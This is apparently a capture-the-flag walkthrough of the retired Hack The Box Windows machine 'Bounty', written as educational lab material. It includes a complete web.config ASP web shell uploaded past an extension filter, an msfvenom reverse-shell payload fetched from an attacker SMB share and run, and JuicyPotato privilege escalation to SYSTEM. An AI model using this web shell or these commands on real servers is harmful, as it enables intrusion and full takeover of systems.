---
title: "HTB: Bounty"
date: 2021-05-24T19:20:20-07:00
draft: false
---

{{< figure src="/img/htb-bounty-titlecard.png" alt="Bounty Title Card" width="400px" >}}
# Overview

Bounty is a retired Windows machine on the [Hack The Box](https://hackthebox.eu/) platform, rated Easy. It's got a very direct exploit path to System but finding it can take a fair amount of enumeration.

Speaking of which, let's start our initial enumeration.

# Initial enumeration
`sudo nmap -sV -sC -v 10.10.10.93 -oN nmap_initial.txt`

|nmap argument|meaning|
|--|:--|
|-sV|Version scan|
|-v|be verbose|
|-sC|Perform script scan w/ default set of scripts|

Nmap output:
```
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```

It looks like there's a web server on port 80. Browsing to http://10.10.10.93/ we find an image of Merlin the wizard. Perhaps a clue for later?
{{< figure src="/img/htb-bounty-http-homepage.png" alt="Bounty homepage cartoon image of Merlin the wizard" width="600px" >}}

Alas no links to other pages in the **index.html** source code
{{< figure src="/img/htb-bounty-index-source.png" alt="Bounty home page source code is minimalistic with no links." width="600px" >}}

## Finding hidden files & directories
With no hints within the site's home page nor a robots.txt to inspect we'll want to dive into enumerating the file/directory structure with a web enumeration tool like *gobuster*.

Since we know the web site is running on IIS it makes sense to limit any search for dynamic content to languages that are typically found on IIS, namely ASP and ASPX. We'll include those extensions in our search.

`gobuster dir -u http://10.10.10.93:80/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -x "asp,aspx" -z -t 20`
|gobuster argument|meaning|
|--|:--|
|dir|directory/file bruteforcing mode|
|-u|URL|
|-w|Wordlist|
|-x|Extensions to try|
|-z|Don't display progress|
|-t|# of threads|

Eventually gobuster will show us two interesting findings: **/transfer.aspx** and the directory **/uploadedfiles/**
{{< figure src="/img/htb-bounty-gobuster-output.png" alt="Gobuster output showing /transfer.aspx and /uploadedfiles/" width="800px" >}}


**http://10.10.10.93/transfer.aspx**:
{{< figure src="/img/htb-bounty-transfer-aspx.png" alt="Bounty transfer.aspx upload page" width="600px" >}}

**http://10.10.10.93/uploadedfiles/**:
{{< figure src="/img/htb-bounty-uploadedfiles.png" alt="Uploaded file dir listing error page" width="600px" >}}

We can list the contents of /uploadedfiles/ but we'll discover we can access uploaded files if we know the file name. The ability to access files we upload ourselves opens up the possibility of running arbitrary code from dynamic content we've uploaded.

# transfer.aspx enumeration
One important thing we'll want to test for is the file types this form will allow us to upload. Once uploaded we can try accessing those files in /uploadedfiles/. Assuming we can get dynamic content onto the server we have a good chance of executing arbitrary code and obtaining a reverse shell on the system.

Steps we'll take:
- Start Burp Suite
- Ensure our browser is using Burp as its proxy
- Submit one file
- Switch to Burp and send the request to the Repeater


# Upload a file
We'll create an empty png file to upload.
`touch test.png && ls -l test.png`
![](/img/htb-bounty-testpng.png)

Within Burp verify our proxy is running:
{{< figure src="/img/htb-burp-settings.png" alt="Burp Proxy settings showing 127.0.0.1:8080" width="600px" >}}

...and confirm in our browser that its set to use a local proxy on the Burp port.

Now that we're set up let's upload our empty .png file.

{{< figure src="/img/htb-bounty-testpngupload.png" alt="Uploading our test file" width="600px" >}}


Press the upload button and switch to Burp Suite. Our request to the web server should appear under the Proxy-Intercept tab (in fact Burp might steal focus from the web browser to show the request).

Right click the request and select "Send to Repeater"

{{< figure src="/img/htb-bounty-sendtorepeater.png" alt="Send the request to Repeater" width="600px" >}}

Click the Repeater tab. We'll now use this tool to change the name of the file extension and probe the extension filter in this upload page.

Click 'go' to send our original request which tests the .png extension.

{{< figure src="/img/htb-bounty-burp-successupload.png" alt="Burp successful upload" width="400px" >}}

Looks like it succeeded. Now, in the Request section under either the *Raw* or *Headers* tabs select and change the extension for our file to **.asp**, then press the Go button again and observe the results.

{{< figure src="/img/htb-bounty-burpfailedupload.png" alt="Burp failed upload" width="400px" >}}

Try a few more extensions. Here is what I found:

|File extension|Result|
|--|:--|
|.png|Success
|.asp|Failure
|.aspx|Failure
|.config|Success

The last extension is an important one: we can possibly upload a .config file with malicious ASP code to execute what we want. A full document on this process can be found [here](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/).

Create a web.config file with the following contents.
**web.config**
```
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Response.write("-"&"->")
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll
end Function

' it is running the ASP code if you can see 3 by opening the web.config file!
' Response.write(1+2)
Response.write("<!-"&"-")
%>
-->
<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's local address:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>
```

Upload the file via http://10.10.10.93/transfer.aspx and quickly browse to http://10.10.10.93/uploadedfiles/web.config. You should see a page with a form that will pass commands to a shell. 


{{< figure src="/img/htb-bounty-webconfig.png" alt="web.config command interface" width="600px" >}}


We'll use this interface to upload a reverse shell binary

**Note: A cleanup process on Bounty will remove our uploaded file every minute so if you get a 404 error when trying to load web.config simply re-upload the file**

## Generate and upload reverse shell binary

We'll generate a simple Windows reverse shell binary executable using msfvenom with a local port of 53.

`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.x.x LPORT=53 -f exe -o reverse.exe`

First on our **attacking** machine:
- launch a netcat listener 

	`rlwrap nc -nlvp 53`
	
- launch a samba server (Impacket's will work nicely)

	`python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .`

Then execute this series of commands in our **web.config shell interface**.
```
mkdir \Temp
copy \\10.10.x.x\kali\reverse.exe \Temp\
\Temp\reverse.exe
```

{{< figure src="/img/htb-bounty-whoami.png" alt="Whoami output showing 'bounty\merlin' as well as SeChangeNotifyPrivilege and SeImpersonatePrivilege privileges (from whoami /priv)" width="600px" >}}

# Grab user flag

The flag file is typically kept in the Desktop directory of the main user of the system. We'll cd to \Users\merlin\Desktop in this case. However if we do a directory listing we'll be met with a surprise.

{{< figure src="/img/htb-bounty-emptymerlindesktop.png" alt="Directory listing of \Users\merlin\Desktop shows no files" width="600px" >}}

No files!

Since the username is merlin and we were shown an image of the famous wizard at the outset of our enumeration as well, perhaps this is a hint at how we should proceed.

If we supply the **dir** command the flags **/ah** this should show any hidden files.

{{< figure src="/img/htb-bounty-hiddenfile.png" alt="Using dir /ah shows a hidden user.txt file" width="600px" >}}



And there's our user.txt file. Run `type user.txt` to display its contents and be sure to paste it into the HTB interface to get your credit (although no points since the machine is retired 😉)

# Post-exploit enumeration
`systeminfo`

{{< figure src="/img/htb-bounty-systeminfo.png" alt="Directory listing of \Users\merlin\Desktop shows no files" width="600px" >}}

Note the system is running Windows Server 2008 R2. The version number **6.1.7600** indicates Service Pack 1 has not been applied, so this host is woefully underpatched.

# Privilege escalation

When we first signed in we saw the current user has the **SeImpersonatePrivilege** privilege. 

{{< figure src="/img/htb-bounty-whoami.png" alt="Whoami output showing 'bounty\merlin' as well as SeChangeNotifyPrivilege and SeImpersonatePrivilege privileges (from whoami /priv)" width="600px" >}}

It happens that there are a series of exploits which abuse this privilege, with names that are variations on a Potato theme. Let's try one called [Juicy Potato](https://infinitelogins.com/2020/12/09/windows-privilege-escalation-abusing-seimpersonateprivilege-juicy-potato/).

First, download the Juice Potato executable [from Github](https://github.com/ohpe/juicy-potato/releases/tag/v0.1)

`wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe`

Then, if it's not still running, run the Impacket Samba server from the directory into which you downloaded JuicyPotato.

`python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .`

In your Bounty shell run `copy \\10.10.x.x\kali\JuicePotato.exe \Temp\`

JuicyPotato takes an argument in the form of the command we want executed. Let's recycle the reverse shell binary we have sitting at \Temp\reverse.exe. On the attacking machine launch another netcat listener on port 53.

`rlwrap nc -nlvp 53`

Then on Bounty run the following to launch JuicyPotato. `JuicyPotato.exe -t * -p C:\Temp\reverse.exe -l 9002`
{{< figure src="/img/htb-bounty-juicypotatoexecution.png" alt="Running JuicyPotato.exe" width="600px" >}}

Looks like it might have succeeded. Switch to our netcat listener:

{{< figure src="/img/htb-bounty-roottxt.png" alt="whoami shows NT Authority\System" width="600px" >}}

We have a shell as NT Authority\System. Go to \Users\Administrator\Desktop and grab the root.txt file. We're done! Thanks for reading!